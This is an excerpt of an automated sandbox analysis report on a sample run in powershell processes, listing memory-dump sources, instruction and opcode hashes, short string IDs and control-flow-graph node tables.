                                                                                                                            • Instruction ID: c4f41613682d5a91c6c2bb40b9cddd8aa24973d461ff52d8aed96292818fe3ec
                                                                                                                            • Opcode Fuzzy Hash: 6cb51515d269f14847a44656652c5f4fe01c4a21bd49701b481094d6c2261dc5
                                                                                                                            • Instruction Fuzzy Hash: 96A147B1704355DFCB258A799810676BBE6AFC2210F2484BBD646CB393DA32C845C7A1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.1854041257.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_76f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                            • API String ID: 0-3272787073
                                                                                                                            • Opcode ID: c405e1e74d022c999c7b5eb98830cabe2a3457d087978005ecdcb8bc17dec70a
                                                                                                                            • Instruction ID: 5deeaa9fda5858c3550ec12a21aadd55c6c457e4ac347e92e93fd9b18545ffab
                                                                                                                            • Opcode Fuzzy Hash: c405e1e74d022c999c7b5eb98830cabe2a3457d087978005ecdcb8bc17dec70a
                                                                                                                            • Instruction Fuzzy Hash: CB5108B270430EDFCB294AB9C810767BBE6AFC3650F14846BD646CB751DA32C886C791
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.1854041257.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_76f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$4'^q$$^q$$^q
                                                                                                                            • API String ID: 0-2831958266
                                                                                                                            • Opcode ID: 91cbdd6dbfc217909fedd7385ea36ffa928a2086bc40dbfb919cc6578b93de7c
                                                                                                                            • Instruction ID: d0de142adaf6a79f6c25b61844d0b24fe448fdea8cc00bfb4a65c52e98f8a5a1
                                                                                                                            • Opcode Fuzzy Hash: 91cbdd6dbfc217909fedd7385ea36ffa928a2086bc40dbfb919cc6578b93de7c
                                                                                                                            • Instruction Fuzzy Hash: 83110DB270D7468FC32916385C2416A6BB2AF83955729459BC242DF357CE258C4A83AB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.1854041257.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_76f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                                            • API String ID: 0-2125118731
                                                                                                                            • Opcode ID: 0afb958097e7eb3c1559d601aff0801c5a50e7fc3a396b715e6b16472b7a5a63
                                                                                                                            • Instruction ID: 6707472ebdc4ef6293ce37e34203aaf1ce1f5492b3cf2798aa8685ff74970db3
                                                                                                                            • Opcode Fuzzy Hash: 0afb958097e7eb3c1559d601aff0801c5a50e7fc3a396b715e6b16472b7a5a63
                                                                                                                            • Instruction Fuzzy Hash: 422149B27103569BDB34997FDC01B27A6D6ABC5715F24882AA606CF385CD36C8418361

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:16.8%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:13.3%
                                                                                                                            Total number of Nodes:30
                                                                                                                            Total number of Limit Nodes:0
                                                                                                                            execution_graph 26825 9aced8 26826 9acee4 26825->26826 26833 63211b0 26826->26833 26838 63211c0 26826->26838 26827 9acf98 26843 6358602 26827->26843 26848 6358608 26827->26848 26828 9ad0b7 26834 63211c0 26833->26834 26835 63212ae 26834->26835 26853 6327d90 26834->26853 26857 6328174 26834->26857 26835->26827 26839 63211e2 26838->26839 26840 63212ae 26839->26840 26841 6327d90 LdrInitializeThunk 26839->26841 26842 6328174 LdrInitializeThunk 26839->26842 26840->26827 26841->26840 26842->26840 26844 635862a 26843->26844 26845 635873c 26844->26845 26846 6327d90 LdrInitializeThunk 26844->26846 26847 6328174 LdrInitializeThunk 26844->26847 26845->26828 26846->26845 26847->26845 26849 635862a 26848->26849 26850 635873c 26849->26850 26851 6327d90 LdrInitializeThunk 26849->26851 26852 6328174 LdrInitializeThunk 26849->26852 26850->26828 26851->26850 26852->26850 26855 6327dc1 26853->26855 26854 6327f21 26854->26835 26855->26854 26856 63282b1 LdrInitializeThunk 26855->26856 26856->26854 26859 632802b 26857->26859 26858 63282b1 LdrInitializeThunk 26860 63282c9 26858->26860 26859->26858 26860->26835
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_9a0000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (o^q$(o^q$(o^q$(o^q$,bq$,bq$Hbq
                                                                                                                            • API String ID: 0-1608600535
                                                                                                                            • Opcode ID: ef9f47af0b4b40178a0a304e04b98a4c0b12897ba6efee31a28aad64f717c503
                                                                                                                            • Instruction ID: 9bf67e6a4b406cb1dff6c25615d2b78e0752f10522f53b55a4a2850dec24adb3
                                                                                                                            • Opcode Fuzzy Hash: ef9f47af0b4b40178a0a304e04b98a4c0b12897ba6efee31a28aad64f717c503
                                                                                                                            • Instruction Fuzzy Hash: 23727071A002199FDB14CF69C984AAEBBF6FF89304F188469E545EB3A1DB34DD41CB90

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 581 9ab328-9ab33b 582 9ab47a-9ab481 581->582 583 9ab341-9ab34a 581->583 584 9ab350-9ab354 583->584 585 9ab484 583->585 586 9ab36e-9ab375 584->586 587 9ab356 584->587 589 9ab489-9ab491 585->589 586->582 590 9ab37b-9ab388 586->590 588 9ab359-9ab364 587->588 588->585 591 9ab36a-9ab36c 588->591 595 9ab44d-9ab453 589->595 596 9ab493-9ab4b0 589->596 590->582 594 9ab38e-9ab3a1 590->594 591->586 591->588 599 9ab3a3 594->599 600 9ab3a6-9ab3ae 594->600 595->589 601 9ab455-9ab469 595->601 597 9ab4dc 596->597 598 9ab4b2-9ab4ca 596->598 604 9ab4de-9ab4e2 597->604 616 9ab4cc-9ab4d1 598->616 617 9ab4d3-9ab4d6 598->617 599->600 602 9ab41b-9ab41d 600->602 603 9ab3b0-9ab3b6 600->603 601->589 611 9ab46b 601->611 602->582 606 9ab41f-9ab425 602->606 603->602 607 9ab3b8-9ab3be 603->607 606->582 609 9ab427-9ab431 606->609 607->589 610 9ab3c4-9ab3dc 607->610 609->589 613 9ab433-9ab44b 609->613 624 9ab409-9ab40c 610->624 625 9ab3de-9ab3e4 610->625 614 9ab470-9ab473 611->614 613->595 613->614 614->585 615 9ab475-9ab478 614->615 615->582 615->609 616->604 619 9ab4d8-9ab4da 617->619 620 9ab4e3-9ab520 617->620 619->597 619->598 629 9ab522 620->629 630 9ab527-9ab604 call 9a3908 call 9a3428 620->630 624->585 627 9ab40e-9ab411 624->627 625->589 628 9ab3ea-9ab3fe 625->628 627->585 631 9ab413-9ab419 627->631 628->589 634 9ab404 628->634 629->630 643 9ab60b-9ab62c call 9a4dc8 630->643 644 9ab606 630->644 631->602 631->603 634->624 646 9ab631-9ab63c 643->646 644->643 647 9ab63e 646->647 648 9ab643-9ab647 646->648 647->648 649 9ab649-9ab64a 648->649 650 9ab64c-9ab653 648->650 651 9ab66b-9ab6af 649->651 652 9ab65a-9ab668 650->652 653 9ab655 650->653 657 9ab715-9ab72c 651->657 652->651 653->652 659 9ab72e-9ab753 657->659 660 9ab6b1-9ab6c7 657->660 666 9ab76b 659->666 667 9ab755-9ab76a 659->667 664 9ab6c9-9ab6d5 660->664 665 9ab6f1 660->665 668 9ab6df-9ab6e5 664->668 669 9ab6d7-9ab6dd 664->669 670 9ab6f7-9ab714 665->670 673 9ab76c 666->673 667->666 671 9ab6ef 668->671 669->671 670->657 671->670 673->673
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_9a0000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                            • API String ID: 0-1487592376
                                                                                                                            • Opcode ID: 4847a400caf5187d3ac905bf3749cd9a4ac60a2b76d273f0b5ef0944ca417906
                                                                                                                            • Instruction ID: 10e57cd8dbbafe7466af50e8a2872ce7796f7e622e83856d1593677dd01f283c
                                                                                                                            • Opcode Fuzzy Hash: 4847a400caf5187d3ac905bf3749cd9a4ac60a2b76d273f0b5ef0944ca417906
                                                                                                                            • Instruction Fuzzy Hash: 49E1FA75A00618DFDB14CFA9D994A9DBBF1FF89310F158069E819AB362DB31AC41CF90

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 676 9abbd2-9abbd9 677 9abbdb-9abc00 676->677 678 9abb95-9abbc8 676->678 679 9abc02 677->679 680 9abc07-9abce4 call 9a3908 call 9a3428 677->680 679->680 691 9abceb-9abd0c call 9a4dc8 680->691 692 9abce6 680->692 694 9abd11-9abd1c 691->694 692->691 695 9abd1e 694->695 696 9abd23-9abd27 694->696 695->696 697 9abd29-9abd2a 696->697 698 9abd2c-9abd33 696->698 699 9abd4b-9abd8f 697->699 700 9abd3a-9abd48 698->700 701 9abd35 698->701 705 9abdf5-9abe0c 699->705 700->699 701->700 707 9abe0e-9abe33 705->707 708 9abd91-9abda7 705->708 715 9abe4b 707->715 716 9abe35-9abe4a 707->716 712 9abda9-9abdb5 708->712 713 9abdd1 708->713 717 9abdbf-9abdc5 712->717 718 9abdb7-9abdbd 712->718 714 9abdd7-9abdf4 713->714 714->705 716->715 719 9abdcf 717->719 718->719 719->714
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_9a0000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                            • API String ID: 0-1487592376
                                                                                                                            • Opcode ID: f09c4bb948122b76c59ba47719fc2babd74a075dbebb67ffd864bbb02edccf58
                                                                                                                            • Instruction ID: 0bc97941881a92f1670d91b00bd221c9c02b8ea5e14e0bc53ffc838b2eb6aabb
                                                                                                                            • Opcode Fuzzy Hash: f09c4bb948122b76c59ba47719fc2babd74a075dbebb67ffd864bbb02edccf58
                                                                                                                            • Instruction Fuzzy Hash: 0281B374E04218DFDB14DFAAD984A9DBBF2BF89300F14C469E419AB366DB349981CF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 767 9ac196-9ac1c0 768 9ac1c2 767->768 769 9ac1c7-9ac2a4 call 9a3908 call 9a3428 767->769 768->769 779 9ac2ab-9ac2cc call 9a4dc8 769->779 780 9ac2a6 769->780 782 9ac2d1-9ac2dc 779->782 780->779 783 9ac2de 782->783 784 9ac2e3-9ac2e7 782->784 783->784 785 9ac2e9-9ac2ea 784->785 786 9ac2ec-9ac2f3 784->786 787 9ac30b-9ac34f 785->787 788 9ac2fa-9ac308 786->788 789 9ac2f5 786->789 793 9ac3b5-9ac3cc 787->793 788->787 789->788 795 9ac3ce-9ac3f3 793->795 796 9ac351-9ac367 793->796 802 9ac40b 795->802 803 9ac3f5-9ac40a 795->803 800 9ac369-9ac375 796->800 801 9ac391 796->801 804 9ac37f-9ac385 800->804 805 9ac377-9ac37d 800->805 806 9ac397-9ac3b4 801->806 803->802 807 9ac38f 804->807 805->807 806->793 807->806
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_9a0000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                            • API String ID: 0-1487592376
                                                                                                                            • Opcode ID: ca37daf6cd7dd775946caa2da696f8ba58a350ad672f538c7cbd730fa56c7543
                                                                                                                            • Instruction ID: 1acc2330e4c688f5c3c2c9af3738fa1dbe3c394bf7f0a130bb25deef2a5258e7
                                                                                                                            • Opcode Fuzzy Hash: ca37daf6cd7dd775946caa2da696f8ba58a350ad672f538c7cbd730fa56c7543
                                                                                                                            • Instruction Fuzzy Hash: AD81C6B4E04218DFDB14DFAAD884A9DBBF2BF89300F14C469E419AB365DB349981CF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 723 9abeb6-9abee0 724 9abee2 723->724 725 9abee7-9abfc4 call 9a3908 call 9a3428 723->725 724->725 735 9abfcb-9abfec call 9a4dc8 725->735 736 9abfc6 725->736 738 9abff1-9abffc 735->738 736->735 739 9abffe 738->739 740 9ac003-9ac007 738->740 739->740 741 9ac009-9ac00a 740->741 742 9ac00c-9ac013 740->742 743 9ac02b-9ac06f 741->743 744 9ac01a-9ac028 742->744 745 9ac015 742->745 749 9ac0d5-9ac0ec 743->749 744->743 745->744 751 9ac0ee-9ac113 749->751 752 9ac071-9ac087 749->752 758 9ac12b 751->758 759 9ac115-9ac12a 751->759 756 9ac089-9ac095 752->756 757 9ac0b1 752->757 760 9ac09f-9ac0a5 756->760 761 9ac097-9ac09d 756->761 762 9ac0b7-9ac0d4 757->762 759->758 763 9ac0af 760->763 761->763 762->749 763->762
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_9a0000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                            • API String ID: 0-1487592376
                                                                                                                            • Opcode ID: e569e468193161e72acc27ac00d970413d69068ad742f2c0477e96ade2cdb603
                                                                                                                            • Instruction ID: 735a8a352a0c581b4fe1bb5c85cd86ec31dec4d4ef87deb4d67033324004dd15
                                                                                                                            • Opcode Fuzzy Hash: e569e468193161e72acc27ac00d970413d69068ad742f2c0477e96ade2cdb603
                                                                                                                            • Instruction Fuzzy Hash: 0C81C3B4E04218DFDB14DFAAD984A9DBBF2BF89300F14C069E419AB365DB349981CF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 856 9ac752-9ac780 857 9ac782 856->857 858 9ac787-9ac864 call 9a3908 call 9a3428 856->858 857->858 868 9ac86b-9ac88c call 9a4dc8 858->868 869 9ac866 858->869 871 9ac891-9ac89c 868->871 869->868 872 9ac89e 871->872 873 9ac8a3-9ac8a7 871->873 872->873 874 9ac8a9-9ac8aa 873->874 875 9ac8ac-9ac8b3 873->875 876 9ac8cb-9ac90f 874->876 877 9ac8ba-9ac8c8 875->877 878 9ac8b5 875->878 882 9ac975-9ac98c 876->882 877->876 878->877 884 9ac98e-9ac9b3 882->884 885 9ac911-9ac927 882->885 891 9ac9cb 884->891 892 9ac9b5-9ac9ca 884->892 889 9ac929-9ac935 885->889 890 9ac951 885->890 893 9ac93f-9ac945 889->893 894 9ac937-9ac93d 889->894 895 9ac957-9ac974 890->895 892->891 896 9ac94f 893->896 894->896 895->882 896->895
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_9a0000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                            • API String ID: 0-1487592376
                                                                                                                            • Opcode ID: 3769c4b1bb49130e71ec6ea64a8db88b644cbcdb5c8a2618bfc2c754f90a64fe
                                                                                                                            • Instruction ID: 77a55bcd23f11caaedf54a155e965648c38e8251949360d8d6d95b442949c82d
                                                                                                                            • Opcode Fuzzy Hash: 3769c4b1bb49130e71ec6ea64a8db88b644cbcdb5c8a2618bfc2c754f90a64fe
                                                                                                                            • Instruction Fuzzy Hash: CD81A3B4E00218DFDB14DFAAD984A9DBBF2BF89300F14C469E419AB365DB349985CF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 811 9a4ad9-9a4b08 812 9a4b0a 811->812 813 9a4b0f-9a4bec call 9a3908 call 9a3428 811->813 812->813 823 9a4bee 813->823 824 9a4bf3-9a4c11 813->824 823->824 854 9a4c14 call 9a4dc8 824->854 855 9a4c14 call 9a4db9 824->855 825 9a4c1a-9a4c25 826 9a4c2c-9a4c30 825->826 827 9a4c27 825->827 828 9a4c32-9a4c33 826->828 829 9a4c35-9a4c3c 826->829 827->826 830 9a4c54-9a4c98 828->830 831 9a4c3e 829->831 832 9a4c43-9a4c51 829->832 836 9a4cfe-9a4d15 830->836 831->832 832->830 838 9a4c9a-9a4cb0 836->838 839 9a4d17-9a4d3c 836->839 843 9a4cda 838->843 844 9a4cb2-9a4cbe 838->844 846 9a4d3e-9a4d53 839->846 847 9a4d54 839->847 845 9a4ce0-9a4cfd 843->845 848 9a4cc8-9a4cce 844->848 849 9a4cc0-9a4cc6 844->849 845->836 846->847 850 9a4cd8 848->850 849->850 850->845 854->825 855->825
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_9a0000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                            • API String ID: 0-1487592376
                                                                                                                            • Opcode ID: 5ae9c0825bc8e0ddf8d0451c2eeda19760b64e68acbd2a4ef7422ec44bf55649
                                                                                                                            • Instruction ID: 7f3722dbe8561818358db25bb5ef497fc8c93b2dfc1111e492167836a8b8977d
                                                                                                                            • Opcode Fuzzy Hash: 5ae9c0825bc8e0ddf8d0451c2eeda19760b64e68acbd2a4ef7422ec44bf55649
                                                                                                                            • Instruction Fuzzy Hash: 1181D274E01218DFDB14DFAAD984A9DBBF2BF89300F14C069E818AB365DB749981CF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 900 9aca32-9aca60 901 9aca62 900->901 902 9aca67-9acb44 call 9a3908 call 9a3428 900->902 901->902 912 9acb4b-9acb6c call 9a4dc8 902->912 913 9acb46 902->913 915 9acb71-9acb7c 912->915 913->912 916 9acb7e 915->916 917 9acb83-9acb87 915->917 916->917 918 9acb89-9acb8a 917->918 919 9acb8c-9acb93 917->919 920 9acbab-9acbef 918->920 921 9acb9a-9acba8 919->921 922 9acb95 919->922 926 9acc55-9acc6c 920->926 921->920 922->921 928 9acc6e-9acc93 926->928 929 9acbf1-9acc07 926->929 935 9accab 928->935 936 9acc95-9accaa 928->936 933 9acc09-9acc15 929->933 934 9acc31 929->934 937 9acc1f-9acc25 933->937 938 9acc17-9acc1d 933->938 939 9acc37-9acc54 934->939 936->935 940 9acc2f 937->940 938->940 939->926 940->939
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_9a0000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                            • API String ID: 0-1487592376
                                                                                                                            • Opcode ID: 64cbc94229a2895c48c81d4075ca392670a45045affb3b49351a2cb839df45bd
                                                                                                                            • Instruction ID: fe74fe436f45b45a7205393cb39160070acfde76b6bf34ffd52d48218cbe4123
                                                                                                                            • Opcode Fuzzy Hash: 64cbc94229a2895c48c81d4075ca392670a45045affb3b49351a2cb839df45bd
                                                                                                                            • Instruction Fuzzy Hash: D281C574E00218DFDB14DFAAD984A9DBBF2BF89310F14C469E419AB365DB349941CF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 944 9ac470-9ac4a0 945 9ac4a2 944->945 946 9ac4a7-9ac584 call 9a3908 call 9a3428 944->946 945->946 956 9ac58b-9ac5ac call 9a4dc8 946->956 957 9ac586 946->957 959 9ac5b1-9ac5bc 956->959 957->956 960 9ac5be 959->960 961 9ac5c3-9ac5c7 959->961 960->961 962 9ac5c9-9ac5ca 961->962 963 9ac5cc-9ac5d3 961->963 964 9ac5eb-9ac62f 962->964 965 9ac5da-9ac5e8 963->965 966 9ac5d5 963->966 970 9ac695-9ac6ac 964->970 965->964 966->965 972 9ac6ae-9ac6d3 970->972 973 9ac631-9ac647 970->973 980 9ac6eb 972->980 981 9ac6d5-9ac6ea 972->981 977 9ac649-9ac655 973->977 978 9ac671 973->978 982 9ac65f-9ac665 977->982 983 9ac657-9ac65d 977->983 979 9ac677-9ac694 978->979 979->970 981->980 984 9ac66f 982->984 983->984 984->979
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_9a0000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                            • API String ID: 0-1487592376
                                                                                                                            • Opcode ID: 637d6f28c56caf6b9043b3b9a0e6782986b64c350d0049494aeda875e4a09649
                                                                                                                            • Instruction ID: 5855f900c37d17e74f99db8b14325d94dc9b7f3d0a83785e8e8c7e9d8779a0c2
                                                                                                                            • Opcode Fuzzy Hash: 637d6f28c56caf6b9043b3b9a0e6782986b64c350d0049494aeda875e4a09649
                                                                                                                            • Instruction Fuzzy Hash: 1881D5B4E00218CFDB14DFAAD984A9DBBF2BF89301F14D469E419AB365DB349981CF50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_9a0000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0oAp$PH^q$PH^q
                                                                                                                            • API String ID: 0-4194141968
                                                                                                                            • Opcode ID: 7c878211612fed19ff33d990120df567d5d7dc7189d95339bd8dc183d1b10fa0
                                                                                                                            • Instruction ID: 8ff1c322e3a54cc4eea9c37f1c08b6c888d1add0189c262803075cb1843ec198
                                                                                                                            • Opcode Fuzzy Hash: 7c878211612fed19ff33d990120df567d5d7dc7189d95339bd8dc183d1b10fa0
                                                                                                                            • Instruction Fuzzy Hash: 1A71E474E042089FDB18DFAAD984A9DBBF2FF89300F14C069E409AB366DB349941CF50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_9a0000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (o^q$4'^q
                                                                                                                            • API String ID: 0-273632683
                                                                                                                            • Opcode ID: 44a3a30b357d714a4da27392ea4f815374fd6638123face74d58c5e05f9badbb
                                                                                                                            • Instruction ID: e5b1de176c8b761cd311fa331544d28457d64a0349e8dcdcc923605f97dd086e
                                                                                                                            • Opcode Fuzzy Hash: 44a3a30b357d714a4da27392ea4f815374fd6638123face74d58c5e05f9badbb
                                                                                                                            • Instruction Fuzzy Hash: 9B729F71A04209DFCB15CF68C984AAEBBF6FF8A310F158559E8059B3A1D734ED41CBA1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_9a0000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Xbq$$^q
                                                                                                                            • API String ID: 0-1593437937
                                                                                                                            • Opcode ID: 1be2bb5a114392341127618a2547a19512b12a37708389d78dcd912fbe91d47a
                                                                                                                            • Instruction ID: 83442fb4150d552093c3ec1d4927617817e95fcc220c58fce3d62e34579c1ce9
                                                                                                                            • Opcode Fuzzy Hash: 1be2bb5a114392341127618a2547a19512b12a37708389d78dcd912fbe91d47a
                                                                                                                            • Instruction Fuzzy Hash: 9DE15C74E04258DFDB08EFB9D8545AEBBB2BFC9701B14C829E406A7354CF399902DB91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                            • API String ID: 0-1598597984
                                                                                                                            • Opcode ID: 40dd4c72627265278e0aa4ae0453b6861eeed7e54f48ef163c73bdad8b39ff8f
                                                                                                                            • Instruction ID: fbaea91dda9c343da64095ce297ff685a054531c4770b17a3333ef990ca4261c
                                                                                                                            • Opcode Fuzzy Hash: 40dd4c72627265278e0aa4ae0453b6861eeed7e54f48ef163c73bdad8b39ff8f
                                                                                                                            • Instruction Fuzzy Hash: 6681B274E00218CFDB58DFAAD954B9DBBF2BF89300F20816AD819AB354DB745945CF90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4162687294.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6320000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5220ef2232c232ba818e1b17bd0b53d1637db70a4fd7462834ad0b1737f4701b
                                                                                                                            • Instruction ID: d2cea2e8226d10a6388974cdb997abfc83bf36fd88f8c1c6917575b8792d4e61
                                                                                                                            • Opcode Fuzzy Hash: 5220ef2232c232ba818e1b17bd0b53d1637db70a4fd7462834ad0b1737f4701b
                                                                                                                            • Instruction Fuzzy Hash: C3F1F574D01229DFDB54DFA9D884B9DBBB2BF88304F10D1A9E408AB355DB349985CF90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4164285595.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_6350000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6cb402124409bb934cb22f621284e20eff0e5ee78bac5d4fba895500a2495598
                                                                                                                            • Instruction ID: 46c33c3a49df94e66570c0321f4b53f6cad9ca941b5a5a2e4c5d50eee1147c67
                                                                                                                            • Opcode Fuzzy Hash: 6cb402124409bb934cb22f621284e20eff0e5ee78bac5d4fba895500a2495598
                                                                                                                            • Instruction Fuzzy Hash: 30827174E012288FDB64DF69C994BDDBBB2BF89301F1081EA940DA7265DB355E85CF40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_9a0000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
